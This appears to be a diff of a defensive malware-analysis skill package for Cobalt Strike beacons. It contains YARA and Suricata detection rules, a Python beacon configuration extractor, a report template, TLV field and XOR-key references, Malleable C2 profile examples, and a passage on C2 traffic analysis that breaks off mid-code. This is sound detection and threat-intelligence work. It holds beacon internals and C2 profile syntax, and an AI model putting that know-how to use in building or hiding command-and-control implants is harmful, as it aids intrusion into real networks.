// XOR'd config marker for CS 4.x (key 0x2e)
|
||||
$config_v4 = { 2e 2f 2e 2c }
|
||||
|
||||
// XOR'd config marker for CS 3.x (key 0x69)
|
||||
$config_v3 = { 69 68 69 6b }
|
||||
|
||||
// Common beacon strings
|
||||
$str_pipe = "\\\\.\\pipe\\" ascii wide
|
||||
$str_beacon = "beacon" ascii nocase
|
||||
$str_sleeptime = "sleeptime" ascii nocase
|
||||
|
||||
// Reflective loader pattern
|
||||
$reflective = { 4D 5A 41 52 55 48 89 E5 }
|
||||
|
||||
condition:
|
||||
($config_v4 or $config_v3) or
|
||||
(2 of ($str_*) and $reflective)
|
||||
}
|
||||
"""
|
||||
|
||||
def scan_for_beacons(filepath):
|
||||
"""Scan file with YARA rules for Cobalt Strike beacons."""
|
||||
rules = yara.compile(source=cobalt_strike_rule)
|
||||
matches = rules.match(filepath)
|
||||
|
||||
for match in matches:
|
||||
print(f"[+] YARA Match: {match.rule}")
|
||||
for string_match in match.strings:
|
||||
offset = string_match.instances[0].offset
|
||||
print(f" String: {string_match.identifier} at offset 0x{offset:x}")
|
||||
|
||||
return matches
|
||||
```
|
||||
|
||||
### Step 4: Network Traffic Correlation
|
||||
|
||||
```python
|
||||
from dissect.cobaltstrike.c2 import HttpC2Config
|
||||
|
||||
def analyze_c2_profile(beacon_config):
|
||||
"""Analyze malleable C2 profile from beacon configuration."""
|
||||
print("\n[+] Malleable C2 Profile Analysis")
|
||||
print("=" * 60)
|
||||
|
||||
# HTTP GET configuration
|
||||
get_verb = beacon_config.get("SETTING_C2_VERB_GET", "GET")
|
||||
get_uri = beacon_config.get("SETTING_C2_REQUEST", "")
|
||||
print(f"\n HTTP GET Request:")
|
||||
print(f" Verb: {get_verb}")
|
||||
print(f" URI: {get_uri}")
|
||||
|
||||
# HTTP POST configuration
|
||||
post_verb = beacon_config.get("SETTING_C2_VERB_POST", "POST")
|
||||
post_uri = beacon_config.get("SETTING_C2_POSTREQ", "")
|
||||
print(f"\n HTTP POST Request:")
|
||||
print(f" Verb: {post_verb}")
|
||||
print(f" URI: {post_uri}")
|
||||
|
||||
# User Agent
|
||||
ua = beacon_config.get("SETTING_USERAGENT", "")
|
||||
print(f"\n User-Agent: {ua}")
|
||||
|
||||
# Host header
|
||||
host = beacon_config.get("SETTING_C2_HOSTHEADER", "")
|
||||
print(f" Host Header: {host}")
|
||||
|
||||
# Sleep and jitter for traffic pattern
|
||||
sleep_ms = beacon_config.get("SETTING_SLEEPTIME", 60000)
|
||||
jitter = beacon_config.get("SETTING_JITTER", 0)
|
||||
print(f"\n Sleep Time: {sleep_ms}ms")
|
||||
print(f" Jitter: {jitter}%")
|
||||
|
||||
# Generate Suricata/Snort signatures
|
||||
print(f"\n[+] Suggested Network Signatures:")
|
||||
if ua:
|
||||
print(f' alert http any any -> any any (msg:"CS Beacon UA"; '
|
||||
f'content:"{ua}"; http_user_agent; sid:1000001; rev:1;)')
|
||||
if get_uri:
|
||||
print(f' alert http any any -> any any (msg:"CS Beacon URI"; '
|
||||
f'content:"{get_uri}"; http_uri; sid:1000002; rev:1;)')
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Beacon configuration successfully extracted from PE file or memory dump
|
||||
- C2 server domains/IPs correctly identified with port and protocol
|
||||
- Malleable C2 profile parameters decoded showing HTTP transforms
|
||||
- Watermark value extracted for attribution correlation
|
||||
- Sleep time and jitter values match observed network beacon intervals
|
||||
- YARA rules detect beacon in both packed and unpacked samples
|
||||
- Network signatures generated from extracted C2 profile
|
||||
|
||||
## References
|
||||
|
||||
- [SentinelOne CobaltStrikeParser](https://github.com/Sentinel-One/CobaltStrikeParser)
|
||||
- [dissect.cobaltstrike Library](https://github.com/fox-it/dissect.cobaltstrike)
|
||||
- [SentinelLabs Beacon Configuration Analysis](https://www.sentinelone.com/labs/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/)
|
||||
- [Cobalt Strike Staging and Config Extraction](https://blog.securehat.co.uk/cobaltstrike/extracting-config-from-cobaltstrike-stager-shellcode)
|
||||
- [MITRE ATT&CK - Cobalt Strike S0154](https://attack.mitre.org/software/S0154/)
|
||||
@@ -0,0 +1,95 @@
|
||||
# Cobalt Strike Beacon Analysis Report Template
|
||||
|
||||
## Report Metadata
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Report ID | CS-BEACON-YYYY-NNNN |
|
||||
| Date | YYYY-MM-DD |
|
||||
| Sample Hash (SHA-256) | |
|
||||
| Classification | TLP:AMBER |
|
||||
| Analyst | |
|
||||
|
||||
## Beacon Configuration Summary
|
||||
|
||||
| Setting | Value |
|
||||
|---------|-------|
|
||||
| Beacon Type | HTTP / HTTPS / SMB / DNS |
|
||||
| C2 Server(s) | |
|
||||
| Port | |
|
||||
| Sleep Time | ms |
|
||||
| Jitter | % |
|
||||
| User-Agent | |
|
||||
| Watermark | |
|
||||
| SpawnTo (x86) | |
|
||||
| SpawnTo (x64) | |
|
||||
| Named Pipe | |
|
||||
| Host Header | |
|
||||
| Crypto Scheme | |
|
||||
|
||||
## C2 Infrastructure
|
||||
|
||||
| Indicator | Type | Value | Context |
|
||||
|-----------|------|-------|---------|
|
||||
| C2 Domain | domain | | Primary callback |
|
||||
| C2 IP | ip | | Resolved address |
|
||||
| URI Path (GET) | uri | | Beacon check-in |
|
||||
| URI Path (POST) | uri | | Data exfiltration |
|
||||
|
||||
## Malleable C2 Profile
|
||||
|
||||
### HTTP GET Configuration
|
||||
| Parameter | Value |
|
||||
|-----------|-------|
|
||||
| URI | |
|
||||
| Verb | |
|
||||
| Headers | |
|
||||
| Metadata Encoding | |
|
||||
|
||||
### HTTP POST Configuration
|
||||
| Parameter | Value |
|
||||
|-----------|-------|
|
||||
| URI | |
|
||||
| Verb | |
|
||||
| ID Encoding | |
|
||||
| Output Encoding | |
|
||||
|
||||
## Watermark Attribution
|
||||
|
||||
| Watermark | Known Association | Confidence |
|
||||
|-----------|------------------|------------|
|
||||
| | Cracked / Licensed / Threat Actor | High/Med/Low |
|
||||
|
||||
## Network Detection Signatures
|
||||
|
||||
```
|
||||
# Suricata signature for beacon C2 traffic
|
||||
alert http $HOME_NET any -> $EXTERNAL_NET any (
|
||||
msg:"Cobalt Strike Beacon C2 Communication";
|
||||
content:"[USER_AGENT]"; http_user_agent;
|
||||
content:"[URI_PATH]"; http_uri;
|
||||
sid:1000001; rev:1;
|
||||
)
|
||||
```
|
||||
|
||||
## YARA Detection Rule
|
||||
|
||||
```yara
|
||||
rule CobaltStrike_Beacon_[CAMPAIGN] {
|
||||
meta:
|
||||
description = "Detects Cobalt Strike beacon from [CAMPAIGN]"
|
||||
hash = "[SHA256]"
|
||||
strings:
|
||||
$c2 = "[C2_DOMAIN]" ascii
|
||||
$pipe = "[NAMED_PIPE]" ascii
|
||||
$ua = "[USER_AGENT]" ascii
|
||||
condition:
|
||||
2 of them
|
||||
}
|
||||
```
|
||||
|
||||
## Recommendations
|
||||
|
||||
1. **Block**: Add C2 domains/IPs to firewall deny lists
|
||||
2. **Hunt**: Search for named pipe and spawn-to process in endpoint logs
|
||||
3. **Detect**: Deploy YARA and network signatures to detection stack
|
||||
4. **Correlate**: Check watermark against threat intelligence databases
|
||||
@@ -0,0 +1,94 @@
|
||||
# Standards and Frameworks Reference
|
||||
|
||||
## Cobalt Strike Beacon Configuration Fields
|
||||
|
||||
### Configuration TLV Types
|
||||
| Type ID | Field Name | Data Type | Description |
|
||||
|---------|-----------|-----------|-------------|
|
||||
| 0x0001 | BeaconType | Short | 0=HTTP, 1=Hybrid HTTP/DNS, 8=HTTPS, 10=TCP Bind |
|
||||
| 0x0002 | Port | Short | C2 communication port |
|
||||
| 0x0003 | SleepTime | Int | Beacon callback interval in milliseconds |
|
||||
| 0x0005 | Jitter | Short | Percentage of sleep time randomization (0-99) |
|
||||
| 0x0008 | C2Server | String | Comma-separated C2 domains/IPs |
|
||||
| 0x0009 | UserAgent | String | HTTP User-Agent header value |
|
||||
| 0x000a | PostURI | String | URI for HTTP POST requests |
|
||||
| 0x000d | SpawnTo_x86 | String | 32-bit process to spawn for post-ex |
|
||||
| 0x000e | SpawnTo_x64 | String | 64-bit process to spawn for post-ex |
|
||||
| 0x001a | Watermark | Int | License watermark identifier |
|
||||
| 0x0024 | PipeName | String | Named pipe for SMB beacon |
|
||||
| 0x001d | HostHeader | String | HTTP Host header value |
|
||||
| 0x0032 | ProxyHostname | String | Proxy server address |
|
||||
|
||||
### XOR Encoding Scheme
|
||||
- **Cobalt Strike 3.x**: XOR key = 0x69
|
||||
- **Cobalt Strike 4.x**: XOR key = 0x2e
|
||||
- Configuration blob size: 4096 bytes (typical)
|
||||
- Encoding: Single-byte XOR across entire config blob
|
||||
|
||||
### Stageless Beacon Structure
|
||||
- PE with beacon code in .data section
|
||||
- 4-byte XOR key applied to .data section content
|
||||
- Configuration embedded after beacon code
|
||||
- Reflective DLL loader prepended to beacon
|
||||
|
||||
## MITRE ATT&CK Mappings
|
||||
|
||||
### Cobalt Strike Techniques (S0154)
|
||||
| Technique | ID | Description |
|
||||
|-----------|-----|------------|
|
||||
| Application Layer Protocol | T1071.001 | HTTP/HTTPS C2 communication |
|
||||
| Encrypted Channel | T1573.002 | AES-256 encrypted C2 |
|
||||
| Ingress Tool Transfer | T1105 | Download additional payloads |
|
||||
| Process Injection | T1055 | Inject into spawned processes |
|
||||
| Named Pipes | T1570 | SMB beacon lateral movement |
|
||||
| Service Execution | T1569.002 | PSExec-style lateral movement |
|
||||
| Reflective Code Loading | T1620 | In-memory beacon loading |
|
||||
|
||||
## Malleable C2 Profile Structure
|
||||
|
||||
### HTTP GET Block
|
||||
```
|
||||
http-get {
|
||||
set uri "/path";
|
||||
client {
|
||||
header "Accept" "text/html";
|
||||
metadata {
|
||||
base64url;
|
||||
prepend "session=";
|
||||
header "Cookie";
|
||||
}
|
||||
}
|
||||
server {
|
||||
header "Content-Type" "text/html";
|
||||
output {
|
||||
print;
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### HTTP POST Block
|
||||
```
|
||||
http-post {
|
||||
set uri "/submit";
|
||||
client {
|
||||
id {
|
||||
uri-append;
|
||||
}
|
||||
output {
|
||||
base64;
|
||||
print;
|
||||
}
|
||||
}
|
||||
server {
|
||||
output {
|
||||
print;
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## References
|
||||
- [Cobalt Strike Documentation](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/)
|
||||
- [Malleable C2 Profile Reference](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2_main.htm)
|
||||
- [MITRE ATT&CK Cobalt Strike](https://attack.mitre.org/software/S0154/)
|
||||
@@ -0,0 +1,72 @@
|
||||
# Cobalt Strike Beacon Analysis Workflows
|
||||
|
||||
## Workflow 1: PE File Configuration Extraction
|
||||
|
||||
```
|
||||
[Suspicious PE] --> [Unpack if packed] --> [Locate .data section] --> [XOR Decrypt]
|
||||
|
|
||||
v
|
||||
[Parse TLV Config]
|
||||
|
|
||||
v
|
||||
[Extract C2 Indicators]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Triage**: Identify file as potential Cobalt Strike beacon via YARA or AV detection
|
||||
2. **Unpacking**: If packed, unpack using appropriate tool (UPX, custom unpacker)
|
||||
3. **Section Analysis**: Locate .data section containing XOR'd beacon code
|
||||
4. **XOR Key Discovery**: Try known keys (0x2e, 0x69) or brute-force 4-byte key
|
||||
5. **Config Parsing**: Parse decrypted TLV entries for C2 and operational settings
|
||||
6. **IOC Extraction**: Extract domains, IPs, URIs, user agents, watermarks
|
||||
|
||||
## Workflow 2: Memory Dump Beacon Extraction
|
||||
|
||||
```
|
||||
[Memory Dump] --> [Volatility3 malfind] --> [Dump Injected Regions] --> [Parse Config]
|
||||
|
|
||||
v
|
||||
[C2 Infrastructure Map]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Acquisition**: Capture memory dump from compromised system
|
||||
2. **Process Scan**: Use Volatility3 to identify suspicious processes
|
||||
3. **Injection Detection**: Use malfind to find RWX memory regions
|
||||
4. **Region Extraction**: Dump injected memory regions to files
|
||||
5. **Config Search**: Scan dumps for beacon configuration signatures
|
||||
6. **Infrastructure Mapping**: Correlate extracted C2 with network logs
|
||||
|
||||
## Workflow 3: Watermark Attribution
|
||||
|
||||
```
|
||||
[Multiple Beacons] --> [Extract Watermarks] --> [Cluster by Watermark] --> [Attribution]
|
||||
|
|
||||
v
|
||||
[Campaign Correlation]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Collection**: Gather beacon samples from incident or threat intel feeds
|
||||
2. **Watermark Extraction**: Extract watermark value from each sample
|
||||
3. **Database Lookup**: Check watermark against known databases
|
||||
4. **Clustering**: Group beacons sharing the same watermark
|
||||
5. **Infrastructure Overlap**: Correlate C2 infrastructure across cluster
|
||||
6. **Attribution Assessment**: Link to known threat actor or cracked license
|
||||
|
||||
## Workflow 4: C2 Traffic Detection
|
||||
|
||||
```
|
||||
[Beacon Config] --> [Extract C2 Profile] --> [Generate Signatures] --> [Deploy to NIDS]
|
||||
|
|
||||
v
|
||||
[Monitor Network Traffic]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Profile Extraction**: Parse malleable C2 profile from beacon config
|
||||
2. **Pattern Identification**: Identify unique HTTP headers, URIs, and encoding
|
||||
3. **Signature Creation**: Write Suricata/Snort rules matching C2 patterns
|
||||
4. **Deployment**: Deploy signatures to network detection infrastructure
|
||||
5. **Validation**: Test signatures against captured beacon traffic
|
||||
6. **Monitoring**: Alert on matching network flows for active beacons
|
||||
@@ -0,0 +1,337 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Cobalt Strike Beacon Configuration Analyzer
|
||||
|
||||
Extracts and analyzes beacon configurations from PE files, shellcode,
|
||||
and memory dumps using dissect.cobaltstrike and manual parsing.
|
||||
|
||||
Requirements:
|
||||
pip install dissect.cobaltstrike pefile yara-python
|
||||
|
||||
Usage:
|
||||
python process.py --file beacon.exe --output report.json
|
||||
python process.py --file memdump.bin --scan-memory
|
||||
python process.py --directory ./samples --batch
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import struct
|
||||
import sys
|
||||
from collections import defaultdict
|
||||
from datetime import datetime
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
from dissect.cobaltstrike.beacon import BeaconConfig
|
||||
except ImportError:
|
||||
print("ERROR: dissect.cobaltstrike not installed.")
|
||||
print("Run: pip install dissect.cobaltstrike")
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
# TLV field type mapping
|
||||
TLV_FIELDS = {
|
||||
0x0001: ("BeaconType", "short"),
|
||||
0x0002: ("Port", "short"),
|
||||
0x0003: ("SleepTime", "int"),
|
||||
0x0004: ("MaxGetSize", "int"),
|
||||
0x0005: ("Jitter", "short"),
|
||||
0x0006: ("MaxDNS", "short"),
|
||||
0x0008: ("C2Server", "str"),
|
||||
0x0009: ("UserAgent", "str"),
|
||||
0x000a: ("PostURI", "str"),
|
||||
0x000b: ("Malleable_C2_Instructions", "blob"),
|
||||
0x000d: ("SpawnTo_x86", "str"),
|
||||
0x000e: ("SpawnTo_x64", "str"),
|
||||
0x000f: ("CryptoScheme", "short"),
|
||||
0x001a: ("Watermark", "int"),
|
||||
0x001d: ("HostHeader", "str"),
|
||||
0x0024: ("PipeName", "str"),
|
||||
0x0025: ("Year", "short"),
|
||||
0x0026: ("Month", "short"),
|
||||
0x0027: ("Day", "short"),
|
||||
0x002c: ("ProxyHostname", "str"),
|
||||
0x002d: ("ProxyUsername", "str"),
|
||||
0x002e: ("ProxyPassword", "str"),
|
||||
}
|
||||
|
||||
BEACON_TYPES = {
|
||||
0: "HTTP",
|
||||
1: "Hybrid HTTP/DNS",
|
||||
2: "SMB",
|
||||
4: "TCP",
|
||||
8: "HTTPS",
|
||||
10: "TCP Bind",
|
||||
14: "External C2",
|
||||
}
|
||||
|
||||
|
||||
class BeaconAnalyzer:
|
||||
"""Analyze Cobalt Strike beacon configurations."""
|
||||
|
||||
def __init__(self):
|
||||
self.results = []
|
||||
|
||||
def analyze_file(self, filepath):
|
||||
"""Extract beacon config from a file."""
|
||||
filepath = Path(filepath)
|
||||
if not filepath.exists():
|
||||
print(f"[-] File not found: {filepath}")
|
||||
return None
|
||||
|
||||
print(f"[*] Analyzing: {filepath}")
|
||||
|
||||
# Try dissect.cobaltstrike first
|
||||
result = self._extract_with_dissect(filepath)
|
||||
|
||||
# Fall back to manual extraction
|
||||
if not result:
|
||||
result = self._extract_manual(filepath)
|
||||
|
||||
if result:
|
||||
result["source_file"] = str(filepath)
|
||||
result["analysis_time"] = datetime.now().isoformat()
|
||||
self.results.append(result)
|
||||
|
||||
return result
|
||||
|
||||
def _extract_with_dissect(self, filepath):
|
||||
"""Extract config using dissect.cobaltstrike library."""
|
||||
try:
|
||||
configs = list(BeaconConfig.from_path(filepath))
|
||||
if not configs:
|
||||
return None
|
||||
|
||||
config = configs[0]
|
||||
settings = config.as_dict()
|
||||
|
||||
result = {
|
||||
"method": "dissect.cobaltstrike",
|
||||
"config": {},
|
||||
"indicators": {},
|
||||
}
|
||||
|
||||
for key, value in settings.items():
|
||||
if value is not None:
|
||||
result["config"][key] = str(value)
|
||||
|
||||
result["indicators"] = self._extract_indicators(settings)
|
||||
return result
|
||||
|
||||
except Exception as e:
|
||||
print(f" [!] dissect extraction failed: {e}")
|
||||
return None
|
||||
|
||||
def _extract_manual(self, filepath):
|
||||
"""Manual XOR-based config extraction."""
|
||||
try:
|
||||
with open(filepath, "rb") as f:
|
||||
data = f.read()
|
||||
except Exception as e:
|
||||
print(f" [!] Read failed: {e}")
|
||||
return None
|
||||
|
||||
for xor_key in [0x2e, 0x69]:
|
||||
# Search for XOR'd config start marker
|
||||
magic = bytes([0x00 ^ xor_key, 0x01 ^ xor_key,
|
||||
0x00 ^ xor_key, 0x02 ^ xor_key])
|
||||
|
||||
offset = data.find(magic)
|
||||
if offset == -1:
|
||||
continue
|
||||
|
||||
print(f" [+] Config found at 0x{offset:x} (XOR key: 0x{xor_key:02x})")
|
||||
|
||||
config_blob = data[offset:offset + 4096]
|
||||
decrypted = bytes([b ^ xor_key for b in config_blob])
|
||||
|
||||
entries = self._parse_tlv(decrypted)
|
||||
if entries:
|
||||
return {
|
||||
"method": "manual_xor",
|
||||
"xor_key": f"0x{xor_key:02x}",
|
||||
"config_offset": f"0x{offset:x}",
|
||||
"config": entries,
|
||||
"indicators": self._extract_indicators(entries),
|
||||
}
|
||||
|
||||
return None
|
||||
|
||||
def _parse_tlv(self, data):
|
||||
"""Parse TLV configuration entries."""
|
||||
entries = {}
|
||||
offset = 0
|
||||
|
||||
while offset + 6 <= len(data):
|
||||
try:
|
||||
entry_type = struct.unpack(">H", data[offset:offset+2])[0]
|
||||
data_type = struct.unpack(">H", data[offset+2:offset+4])[0]
|
||||
entry_len = struct.unpack(">H", data[offset+4:offset+6])[0]
|
||||
except struct.error:
|
||||
break
|
||||
|
||||
if entry_type == 0 or entry_len > 4096:
|
||||
break
|
||||
|
||||
value_data = data[offset+6:offset+6+entry_len]
|
||||
field_info = TLV_FIELDS.get(entry_type)
|
||||
|
||||
if field_info:
|
||||
field_name, expected_type = field_info
|
||||
else:
|
||||
field_name = f"Unknown_0x{entry_type:04x}"
|
||||
expected_type = "blob"
|
||||
|
||||
if data_type == 1 and len(value_data) >= 2:
|
||||
value = struct.unpack(">H", value_data[:2])[0]
|
||||
elif data_type == 2 and len(value_data) >= 4:
|
||||
value = struct.unpack(">I", value_data[:4])[0]
|
||||
elif data_type == 3:
|
||||
value = value_data.rstrip(b'\x00').decode('utf-8', errors='replace')
|
||||
else:
|
||||
value = value_data.hex()
|
||||
|
||||
# Resolve beacon type names
|
||||
if field_name == "BeaconType" and isinstance(value, int):
|
||||
value = BEACON_TYPES.get(value, f"Unknown ({value})")
|
||||
|
||||
entries[field_name] = value
|
||||
offset += 6 + entry_len
|
||||
|
||||
return entries
|
||||
|
||||
def _extract_indicators(self, config):
|
||||
"""Extract IOCs from parsed configuration."""
|
||||
indicators = {
|
||||
"c2_servers": [],
|
||||
"user_agent": "",
|
||||
"named_pipes": [],
|
||||
"spawn_processes": [],
|
||||
"watermark": "",
|
||||
"beacon_type": "",
|
||||
"sleep_time_ms": 0,
|
||||
"jitter_pct": 0,
|
||||
}
|
||||
|
||||
# Handle both dissect dict keys and manual parse keys
|
||||
c2_keys = ["SETTING_DOMAINS", "C2Server"]
|
||||
for key in c2_keys:
|
||||
domains = config.get(key, "")
|
||||
if domains:
|
||||
for d in str(domains).split(","):
|
||||
d = d.strip().rstrip("/")
|
||||
if d:
|
||||
indicators["c2_servers"].append(d)
|
||||
|
||||
ua_keys = ["SETTING_USERAGENT", "UserAgent"]
|
||||
for key in ua_keys:
|
||||
ua = config.get(key, "")
|
||||
if ua:
|
||||
indicators["user_agent"] = str(ua)
|
||||
|
||||
pipe_keys = ["SETTING_PIPENAME", "PipeName"]
|
||||
for key in pipe_keys:
|
||||
pipe = config.get(key, "")
|
||||
if pipe:
|
||||
indicators["named_pipes"].append(str(pipe))
|
||||
|
||||
spawn_keys = [
|
||||
("SETTING_SPAWNTO_X86", "SpawnTo_x86"),
|
||||
("SETTING_SPAWNTO_X64", "SpawnTo_x64"),
|
||||
]
|
||||
for dissect_key, manual_key in spawn_keys:
|
||||
for key in [dissect_key, manual_key]:
|
||||
proc = config.get(key, "")
|
||||
if proc:
|
||||
indicators["spawn_processes"].append(str(proc))
|
||||
|
||||
wm_keys = ["SETTING_WATERMARK", "Watermark"]
|
||||
for key in wm_keys:
|
||||
wm = config.get(key, "")
|
||||
if wm:
|
||||
indicators["watermark"] = str(wm)
|
||||
|
||||
return indicators
|
||||
|
||||
def batch_analyze(self, directory):
|
||||
"""Analyze all files in a directory."""
|
||||
directory = Path(directory)
|
||||
extensions = {".exe", ".dll", ".bin", ".dmp", ".raw"}
|
||||
|
||||
for filepath in directory.rglob("*"):
|
||||
if filepath.suffix.lower() in extensions:
|
||||
self.analyze_file(filepath)
|
||||
|
||||
return self.results
|
||||
|
||||
def cluster_by_watermark(self):
|
||||
"""Cluster analyzed beacons by watermark."""
|
||||
clusters = defaultdict(list)
|
||||
|
||||
for result in self.results:
|
||||
wm = result.get("indicators", {}).get("watermark", "unknown")
|
||||
clusters[wm].append(result.get("source_file", "unknown"))
|
||||
|
||||
return dict(clusters)
|
||||
|
||||
def generate_report(self, output_path=None):
|
||||
"""Generate JSON analysis report."""
|
||||
report = {
|
||||
"analysis_date": datetime.now().isoformat(),
|
||||
"total_beacons": len(self.results),
|
||||
"watermark_clusters": self.cluster_by_watermark(),
|
||||
"all_c2_servers": list(set(
|
||||
server
|
||||
for r in self.results
|
||||
for server in r.get("indicators", {}).get("c2_servers", [])
|
||||
)),
|
||||
"results": self.results,
|
||||
}
|
||||
|
||||
if output_path:
|
||||
with open(output_path, "w") as f:
|
||||
json.dump(report, f, indent=2, default=str)
|
||||
print(f"[+] Report saved to {output_path}")
|
||||
|
||||
return report
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Cobalt Strike Beacon Configuration Analyzer"
|
||||
)
|
||||
parser.add_argument("--file", help="Single file to analyze")
|
||||
parser.add_argument("--directory", help="Directory for batch analysis")
|
||||
parser.add_argument("--output", default="beacon_report.json",
|
||||
help="Output report path")
|
||||
parser.add_argument("--scan-memory", action="store_true",
|
||||
help="Treat input as raw memory dump")
|
||||
parser.add_argument("--batch", action="store_true",
|
||||
help="Batch analyze directory")
|
||||
|
||||
args = parser.parse_args()
|
||||
analyzer = BeaconAnalyzer()
|
||||
|
||||
if args.file:
|
||||
result = analyzer.analyze_file(args.file)
|
||||
if result:
|
||||
print(json.dumps(result, indent=2, default=str))
|
||||
|
||||
elif args.directory and args.batch:
|
||||
results = analyzer.batch_analyze(args.directory)
|
||||
print(f"\n[+] Analyzed {len(results)} beacons")
|
||||
|
||||
else:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
report = analyzer.generate_report(args.output)
|
||||
print(f"\n[+] Total C2 servers found: {len(report['all_c2_servers'])}")
|
||||
for server in report["all_c2_servers"]:
|
||||
print(f" {server}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,387 @@
|
||||
---
|
||||
name: analyzing-command-and-control-communication
|
||||
description: >
|
||||
Analyzes malware command-and-control (C2) communication protocols to understand beacon
|
||||
patterns, command structures, data encoding, and infrastructure. Covers HTTP, HTTPS, DNS,
|
||||
and custom protocol C2 analysis for detection development and threat intelligence.
|
||||
Activates for requests involving C2 analysis, beacon detection, C2 protocol reverse
|
||||
engineering, or command-and-control infrastructure mapping.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, C2, command-and-control, beacon, protocol-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Command-and-Control Communication
|
||||
|
||||
## When to Use
|
||||
|
||||
- Reverse engineering a malware sample has revealed network communication that needs protocol analysis
|
||||
- Building network-level detection signatures for a specific C2 framework (Cobalt Strike, Metasploit, Sliver)
|
||||
- Mapping C2 infrastructure including primary servers, fallback domains, and dead drops
|
||||
- Analyzing encrypted or encoded C2 traffic to understand the command set and data format
|
||||
- Attributing malware to a threat actor based on C2 infrastructure patterns and tooling
|
||||
|
||||
**Do not use** for general network anomaly detection; this is specifically for understanding known or suspected C2 protocols from malware analysis.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- PCAP capture of malware network traffic (from sandbox, network tap, or full packet capture)
|
||||
- Wireshark/tshark for packet-level analysis
|
||||
- Reverse engineering tools (Ghidra, dnSpy) for understanding C2 code in the malware binary
|
||||
- Python 3.8+ with `scapy`, `dpkt`, and `requests` for protocol analysis and replay
|
||||
- Threat intelligence databases for C2 infrastructure correlation (VirusTotal, Shodan, Censys)
|
||||
- JA3/JA3S fingerprint databases for TLS-based C2 identification
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the C2 Channel
|
||||
|
||||
Determine the protocol and transport used for C2 communication:
|
||||
|
||||
```
|
||||
C2 Communication Channels:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
HTTP/HTTPS: Most common; uses standard web traffic to blend in
|
||||
Indicators: Regular POST/GET requests, specific URI patterns, custom headers
|
||||
|
||||
DNS: Tunneling data through DNS queries and responses
|
||||
Indicators: High-volume TXT queries, long subdomain names, high entropy
|
||||
|
||||
Custom TCP/UDP: Proprietary binary protocol on non-standard port
|
||||
Indicators: Non-HTTP traffic on high ports, unknown protocol
|
||||
|
||||
ICMP: Data encoded in ICMP echo/reply payloads
|
||||
Indicators: ICMP packets with large or non-standard payloads
|
||||
|
||||
WebSocket: Persistent bidirectional connection for real-time C2
|
||||
Indicators: WebSocket upgrade followed by binary frames
|
||||
|
||||
Cloud Services: Using legitimate APIs (Telegram, Discord, Slack, GitHub)
|
||||
Indicators: API calls to cloud services from unexpected processes
|
||||
|
||||
Email: SMTP/IMAP for C2 commands and data exfiltration
|
||||
Indicators: Automated email operations from non-email processes
|
||||
```
|
||||
|
||||
### Step 2: Analyze Beacon Pattern
|
||||
|
||||
Characterize the periodic communication pattern:
|
||||
|
||||
```python
|
||||
from scapy.all import rdpcap, IP, TCP
|
||||
from collections import defaultdict
|
||||
import statistics
|
||||
import json
|
||||
|
||||
packets = rdpcap("c2_traffic.pcap")
|
||||
|
||||
# Group TCP SYN packets by destination
|
||||
connections = defaultdict(list)
|
||||
for pkt in packets:
|
||||
if IP in pkt and TCP in pkt and (pkt[TCP].flags & 0x02):
|
||||
key = f"{pkt[IP].dst}:{pkt[TCP].dport}"
|
||||
connections[key].append(float(pkt.time))
|
||||
|
||||
# Analyze each destination for beaconing
|
||||
for dst, times in sorted(connections.items()):
|
||||
if len(times) < 3:
|
||||
continue
|
||||
|
||||
intervals = [times[i+1] - times[i] for i in range(len(times)-1)]
|
||||
avg_interval = statistics.mean(intervals)
|
||||
stdev = statistics.stdev(intervals) if len(intervals) > 1 else 0
|
||||
jitter_pct = (stdev / avg_interval * 100) if avg_interval > 0 else 0
|
||||
duration = times[-1] - times[0]
|
||||
|
||||
beacon_data = {
|
||||
"destination": dst,
|
||||
"connections": len(times),
|
||||
"duration_seconds": round(duration, 1),
|
||||
"avg_interval_seconds": round(avg_interval, 1),
|
||||
"stdev_seconds": round(stdev, 1),
|
||||
"jitter_percent": round(jitter_pct, 1),
|
||||
"is_beacon": 5 < avg_interval < 7200 and jitter_pct < 25,
|
||||
}
|
||||
|
||||
if beacon_data["is_beacon"]:
|
||||
print(f"[!] BEACON DETECTED: {dst}")
|
||||
print(f" Interval: {avg_interval:.0f}s +/- {stdev:.0f}s ({jitter_pct:.0f}% jitter)")
|
||||
print(f" Sessions: {len(times)} over {duration:.0f}s")
|
||||
```
|
||||
|
||||
### Step 3: Decode C2 Protocol Structure
|
||||
|
||||
Reverse engineer the message format from captured traffic:
|
||||
|
||||
```python
|
||||
# HTTP-based C2 protocol analysis
|
||||
import dpkt
|
||||
import base64
|
||||
|
||||
with open("c2_traffic.pcap", "rb") as f:
|
||||
pcap = dpkt.pcap.Reader(f)
|
||||
|
||||
for ts, buf in pcap:
|
||||
eth = dpkt.ethernet.Ethernet(buf)
|
||||
if not isinstance(eth.data, dpkt.ip.IP):
|
||||
continue
|
||||
ip = eth.data
|
||||
if not isinstance(ip.data, dpkt.tcp.TCP):
|
||||
continue
|
||||
tcp = ip.data
|
||||
|
